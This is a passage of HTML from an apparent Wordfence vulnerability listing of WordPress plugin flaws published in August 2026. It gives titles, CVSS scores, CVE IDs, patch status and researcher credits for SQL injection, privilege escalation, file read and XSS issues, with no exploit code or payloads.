<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1fed22d4-8526-429c-950b-c5affe108a93" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f9b800e-f09c-40ad-9863-fd245e35033d" target="_blank" rel="noopener">Visitor Traffic Real Time Statistics pro &lt;= 11.17 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32479" target="_blank" rel="noopener noreferrer">							CVE-2026-32479						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visitors-traffic-real-time-statistics-pro" target="_blank" rel="noopener">Visitor Traffic Real Time Statistics pro</a> <span class="wfvr-software-slug">[visitors-traffic-real-time-statistics-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truong-huu-phuc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5ecfc9c03983d74db8c6ffd1ca94ca51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5ecfc9c03983d74db8c6ffd1ca94ca51"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truong-huu-phuc" target="_blank" rel="noopener">Trương Hữu Phúc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f9b800e-f09c-40ad-9863-fd245e35033d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/26a34fd5-bfa2-4675-9451-ea742bd13fa3" target="_blank" rel="noopener">WooCommerce Lottery &lt;= 2.2.9 &#8211; Unauthenticated Time-Based SQL Injection via &#8216;orderby&#8217; and &#8216;order&#8217; Parameters</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18884" target="_blank" rel="noopener noreferrer">							CVE-2026-18884						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-lottery" target="_blank" rel="noopener">WooCommerce Lottery</a> <span class="wfvr-software-slug">[woocommerce-lottery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/26a34fd5-bfa2-4675-9451-ea742bd13fa3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0ddf73e1-cd45-45f7-9635-eb4052d34f67" target="_blank" rel="noopener">WP Data Access – App Builder for Tables, Forms, Charts, Maps &amp; Dashboards &lt;= 5.5.81 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81293" target="_blank" rel="noopener noreferrer">							CVE-2026-81293						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-data-access" target="_blank" rel="noopener">WP Data Access – App Builder for Tables, Forms, Charts, Maps &amp; Dashboards</a> <span class="wfvr-software-slug">[wp-data-access]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sequence-x0" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4a36854ce1b3d726839f26041f205bdd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4a36854ce1b3d726839f26041f205bdd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sequence-x0" target="_blank" rel="noopener">sequence_X0</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0ddf73e1-cd45-45f7-9635-eb4052d34f67" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bf0eab48-ef8b-4578-8a9a-c48e09cb29f7" target="_blank" rel="noopener">wpForo Forum &lt;= 2.4.17 &#8211; Unauthenticated SQL Injection via &#8216;referer&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5097" target="_blank" rel="noopener noreferrer">							CVE-2026-5097						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo" target="_blank" rel="noopener">wpForo Forum</a> <span class="wfvr-software-slug">[wpforo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/leonid-semenenko" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/db76c9ad8fed7273064e3381b162549b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="db76c9ad8fed7273064e3381b162549b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/leonid-semenenko" target="_blank" rel="noopener">Leonid Semenenko (lsemenenko)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bf0eab48-ef8b-4578-8a9a-c48e09cb29f7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8536c845-8253-4e7b-8bec-8659fd428cba" target="_blank" rel="noopener">爱采集数据采集和发布插件 &lt;= 1.0.0 &#8211; Unauthenticated Arbitrary File Read</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77012" target="_blank" rel="noopener noreferrer">							CVE-2026-77012						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/icollect" target="_blank" rel="noopener">爱采集数据采集和发布插件</a> <span class="wfvr-software-slug">[icollect]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8536c845-8253-4e7b-8bec-8659fd428cba" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8d8c602f-3ab2-4ccd-8d3c-cfb9d4be540d" target="_blank" rel="noopener">Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress 1.5.6 &#8211; 1.6.2 &#8211; Unauthenticated Booking Price Manipulation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76586" target="_blank" rel="noopener noreferrer">							CVE-2026-76586						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookingpress-appointment-booking" target="_blank" rel="noopener">Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress</a> <span class="wfvr-software-slug">[bookingpress-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-phuoc-thinh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/36e9416dfbe25a51cc77fdbf14a7cc42.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="36e9416dfbe25a51cc77fdbf14a7cc42"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-phuoc-thinh" target="_blank" rel="noopener">Nguyen Phuoc Thinh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8d8c602f-3ab2-4ccd-8d3c-cfb9d4be540d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4fdc0f-585a-488e-8df9-9bbd1dca824f" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder &lt; 1.57.1 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19220" target="_blank" rel="noopener noreferrer">							CVE-2026-19220						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4fdc0f-585a-488e-8df9-9bbd1dca824f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c5aa7e58-79f4-426d-af93-7792ddef7f3a" target="_blank" rel="noopener">HEL Online Classroom: AI-powered Online Classrooms &lt;= 1.0.3 &#8211; Missing Authorization to Unauthenticated Settings Update</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77008" target="_blank" rel="noopener noreferrer">							CVE-2026-77008						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hel-online-classroom" target="_blank" rel="noopener">HEL Online Classroom: AI-powered Online Classrooms</a> <span class="wfvr-software-slug">[hel-online-classroom]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kimsunghoon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2bbb850fa7caee630973169f68ae8160.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2bbb850fa7caee630973169f68ae8160"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kimsunghoon" target="_blank" rel="noopener">kimsunghoon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c5aa7e58-79f4-426d-af93-7792ddef7f3a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/154d2fc1-15da-4e0d-a5fc-a5d708fad410" target="_blank" rel="noopener">Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile &amp; Restrict Content – ProfilePress &lt; 4.17.1 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19848" target="_blank" rel="noopener noreferrer">							CVE-2026-19848						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-avatar" target="_blank" rel="noopener">Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile &amp; Restrict Content – ProfilePress</a> <span class="wfvr-software-slug">[wp-user-avatar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/154d2fc1-15da-4e0d-a5fc-a5d708fad410" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c813654-de1f-40e8-a970-c61850adf933" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login &lt;= 6.0.9.8 &#8211; Authentication Bypass</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82225" target="_blank" rel="noopener noreferrer">							CVE-2026-82225						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</a> <span class="wfvr-software-slug">[custom-registration-form-builder-with-submission-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/emiliano-carrizo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851380a0ae432961e3bc66b0b30bb576.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851380a0ae432961e3bc66b0b30bb576"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/emiliano-carrizo" target="_blank" rel="noopener">emiliano carrizo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c813654-de1f-40e8-a970-c61850adf933" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02f7e67a-3d9e-4bc2-9ada-d07ddda97c98" target="_blank" rel="noopener">RestrictMate – Restrict Page, Post and any Content ( Content Restriction and Membership Plugin) &lt; 1.3.0 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13598" target="_blank" rel="noopener noreferrer">							CVE-2026-13598						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restrictmate" target="_blank" rel="noopener">RestrictMate – Restrict Page, Post and any Content ( Content Restriction and Membership Plugin)</a> <span class="wfvr-software-slug">[restrictmate]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02f7e67a-3d9e-4bc2-9ada-d07ddda97c98" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d518f02a-073d-4eb8-8b9d-0a2ff815b0f3" target="_blank" rel="noopener">Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction &amp; Membership Plugin 2.6.7 &#8211; 2.12.1 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19423" target="_blank" rel="noopener noreferrer">							CVE-2026-19423						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-member" target="_blank" rel="noopener">Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction &amp; Membership Plugin</a> <span class="wfvr-software-slug">[ultimate-member]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d518f02a-073d-4eb8-8b9d-0a2ff815b0f3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d61ae924-6ded-4930-a1fa-ca08d46bf8b9" target="_blank" rel="noopener">12 Step Meeting List 3.17 &#8211; 3.19.16 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78333" target="_blank" rel="noopener noreferrer">							CVE-2026-78333						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/12-step-meeting-list" target="_blank" rel="noopener">12 Step Meeting List</a> <span class="wfvr-software-slug">[12-step-meeting-list]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
